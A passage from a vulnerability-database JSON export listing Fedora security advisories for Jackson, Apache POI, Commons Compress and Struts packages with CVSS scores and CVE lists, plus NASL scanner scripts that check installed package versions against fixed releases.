prefix:\"libstruts1.2-java\", reference:\"1.2.9-5+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "fedora": [{"lastseen": "2021-07-28T14:46:51", "description": "Project for parent pom for all Jackson components. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-12T00:29:49", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: jackson-parent-2.10-1.fc30", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14540", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943"], "modified": "2019-10-12T00:29:49", "id": "FEDORA:18A7960877B3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/N2KHDT3IPBKLVBRWQXAKXQXCTFG6W4UX/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:51", "description": "Core annotations used for value types, used by Jackson data-binding package. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-26T17:30:55", "type": "fedora", "title": "[SECURITY] Fedora 31 Update: jackson-annotations-2.10.0-1.fc31", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14540", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943"], "modified": "2019-10-26T17:30:55", "id": "FEDORA:277F560476FA", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/DQPRDZIY5XBP6IGPQ7VJUVJUSO7PAMSH/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:51", "description": "The general-purpose data-binding functionality and tree-model for Jackson D ata Processor. It builds on core streaming parser/generator package, and uses Jackson Annotations for configuration. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-26T17:30:55", "type": "fedora", "title": "[SECURITY] Fedora 31 Update: jackson-databind-2.10.0-1.fc31", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14540", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943"], "modified": "2019-10-26T17:30:55", "id": "FEDORA:AE8886060E81", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/A5OXHI43AG2UWCSTYYTASAVK2VIHIJDS/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:51", "description": "Core part of Jackson that defines Streaming API as well as basic shared abstractions. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-26T17:30:55", "type": "fedora", "title": "[SECURITY] Fedora 31 Update: jackson-core-2.10.0-1.fc31", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14540", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943"], "modified": "2019-10-26T17:30:55", "id": "FEDORA:929076060E6D", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/Q7CANA7KV53JROZDX5Z5P26UG5VN2K43/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:51", "description": "Project for parent pom for all Jackson components. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-26T17:30:55", "type": "fedora", "title": "[SECURITY] Fedora 31 Update: jackson-parent-2.10-1.fc31", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14540", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943"], "modified": "2019-10-26T17:30:55", "id": "FEDORA:C91E46060E8C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/PE6C23MULONYJO2LUE3KAPVXR7HUU4EH/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:51", "description": "Core annotations used for value types, used by Jackson data-binding package. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-12T00:29:48", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: jackson-annotations-2.10.0-1.fc30", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14540", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943"], "modified": "2019-10-12T00:29:48", "id": "FEDORA:4D359608778C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/6DWXRMZMLNYP6T5RFMNNHUVSQYNFRUTQ/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:51", "description": "Core part of Jackson that defines Streaming API as well as basic shared abstractions. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-12T00:29:48", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: jackson-core-2.10.0-1.fc30", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14540", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943"], "modified": "2019-10-12T00:29:48", "id": "FEDORA:BFF95608779F", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/TH5VFUN4P7CCIP7KSEXYA5MUTFCUDUJT/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:51", "description": "A \"bill of materials\" POM for Jackson dependencies. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-12T00:29:48", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: jackson-bom-2.10.0-1.fc30", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14540", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943"], "modified": "2019-10-12T00:29:48", "id": "FEDORA:A09EE6087595", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/33HU6Z2AB327DF4Q6SABY7NDN2Z32MS2/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:51", "description": "A \"bill of materials\" POM for Jackson dependencies. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-26T17:30:55", "type": "fedora", "title": "[SECURITY] Fedora 31 Update: jackson-bom-2.10.0-1.fc31", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14540", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943"], "modified": "2019-10-26T17:30:55", "id": "FEDORA:772A7605712B", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/LQT5BNRE7LKJICVXCTQLDIGUNWFWNZM6/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "The Apache POI Project's mission is to create and maintain Java APIs for manipulating various file formats based upon the Office Open XML standards (OOXML) and Microsoft's OLE 2 Compound Document format (OLE2). In short, you can read and write MS Excel files using Java. In addition, you can read and write MS Word and MS PowerPoint files using Java. Apache POI is your Java Excel solution (for Excel 97-2008). We have a complete API for porting other OOXML and OLE2 formats and welcome others to participate. OLE2 files include most Microsoft Office files such as XLS, DOC, and PPT as well as MFC serialization API based file formats. The project provides APIs for the OLE2 Filesystem (POIFS) and OLE2 Document Properties (HPSF). Office OpenXML Format is the new standards based XML file format found in Microsoft Office 2007 and 2008. This includes XLSX, DOCX and PPTX. The project provides a low level API to support the Open Packaging Conventions using openxml4j. For each MS Office application there exists a component module that attempts to provide a common high level Java API to both OLE2 and OOXML document formats. This is most developed for Excel workbooks (SS=3DHSSF+XSSF). Work is progressing for Word documents (HWPF+XWPF) and PowerPoint presentations (HSLF+XSLF). The project has recently added support for Outlook (HSMF). Microsoft opened the specifications to this format in October 2007. We would welcome contributions. There are also projects for Visio (HDGF) and Publisher (HPBF). ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-04-27T04:19:01", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: apache-poi-3.17-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12626"], "modified": "2018-04-27T04:19:01", "id": "FEDORA:398FD60CEC5A", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/STKLIH57QLIVDD6JBCDLQTSNP5AIBRDD/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-07-28T14:46:51", "description": "The general-purpose data-binding functionality and tree-model for Jackson D ata Processor. It builds on core streaming parser/generator package, and uses Jackson Annotations for configuration. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-12T00:29:48", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: jackson-databind-2.10.0-1.fc30", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12384", "CVE-2019-14540", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943"], "modified": "2019-10-12T00:29:48", "id": "FEDORA:D948D608771F", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4JYW4U272JPM7AYVNENNTWYYYAAQ4TZO/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "The Apache Commons Compress library defines an API for working with ar, cpio, Unix dump, tar, zip, gzip, XZ, Pack200 and bzip2 files. In version 1.14 read-only support for Brotli decompression has been added, but it has been removed form this package. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-10-19T16:08:50", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: apache-commons-compress-1.16.1-2.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11771"], "modified": "2018-10-19T16:08:50", "id": "FEDORA:D3F4E61F0A04", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QPA6OSECX5L74AOD237N3C2L2BTW3MG5/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "The Apache Commons Compress library defines an API for working with ar, cpio, Unix dump, tar, zip, gzip, XZ, Pack200 and bzip2 files. In version 1.14 read-only support for Brotli decompression has been added, but it has been removed form this package. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-10-09T00:08:22", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: apache-commons-compress-1.17-3.fc29", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11771"], "modified": "2018-10-09T00:08:22", "id": "FEDORA:45E8A60321BE", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/FLKWBUZ7KVAJV6VZAY2UYW5JIEVMRT2R/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "Welcome to the Struts Framework! The goal of this project is to provide an open source framework useful in building web applications with Java Servlet and JavaServer Pages (JSP) technology. Struts encourages application architectures based on the Model-View-Controller (MVC) design paradigm, colloquially known as Model 2 in discussions on various servlet and JSP related mailing lists. Struts includes the following primary areas of functionality: A controller servlet that dispatches requests to appropriate Action classes provided by the application developer. JSP custom tag libraries, and associated support in the controller servlet, that assists developers in creating interactive form-based applications. Utility classes to support XML parsing, automatic population of JavaBeans properties based on the Java reflection APIs, and internationalization of prompts and messages. ", "cvss3": {}, "published": "2014-08-23T02:00:36", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: struts-1.3.10-10.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2014-08-23T02:00:36", "id": "FEDORA:50818233B7", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/EH2O4TPHYK75XNXLJHQFMSGKRGBR3UXK/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-10-15T14:42:12", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-10-12T00:00:00", "type": "openvas", "title": "Fedora Update for jackson-bom FEDORA-2019-b171554877", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-16942", "CVE-2019-14540", "CVE-2019-16943", "CVE-2019-16335"], "modified": "2019-10-15T00:00:00", "id": "OPENVAS:1361412562310876908", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876908", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876908\");\n script_version(\"2019-10-15T06:42:05+0000\");\n script_cve_id(\"CVE-2019-14540\", \"CVE-2019-16335\", \"CVE-2019-16942\", \"CVE-2019-16943\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-15 06:42:05 +0000 (Tue, 15 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-10-12 02:30:50 +0000 (Sat, 12 Oct 2019)\");\n script_name(\"Fedora Update for jackson-bom FEDORA-2019-b171554877\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-b171554877\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/33HU6Z2AB327DF4Q6SABY7NDN2Z32MS2\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jackson-bom'\n package(s) announced via the FEDORA-2019-b171554877 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A 'bill of materials' POM for Jackson dependencies.\");\n\n script_tag(name:\"affected\", value:\"'jackson-bom' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"jackson-bom\", rpm:\"jackson-bom~2.10.0~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T19:26:00", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-10-03T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for jackson-databind (DLA-1943-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-16942", "CVE-2019-14540", "CVE-2019-16943", "CVE-2019-16335"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891943", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891943", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 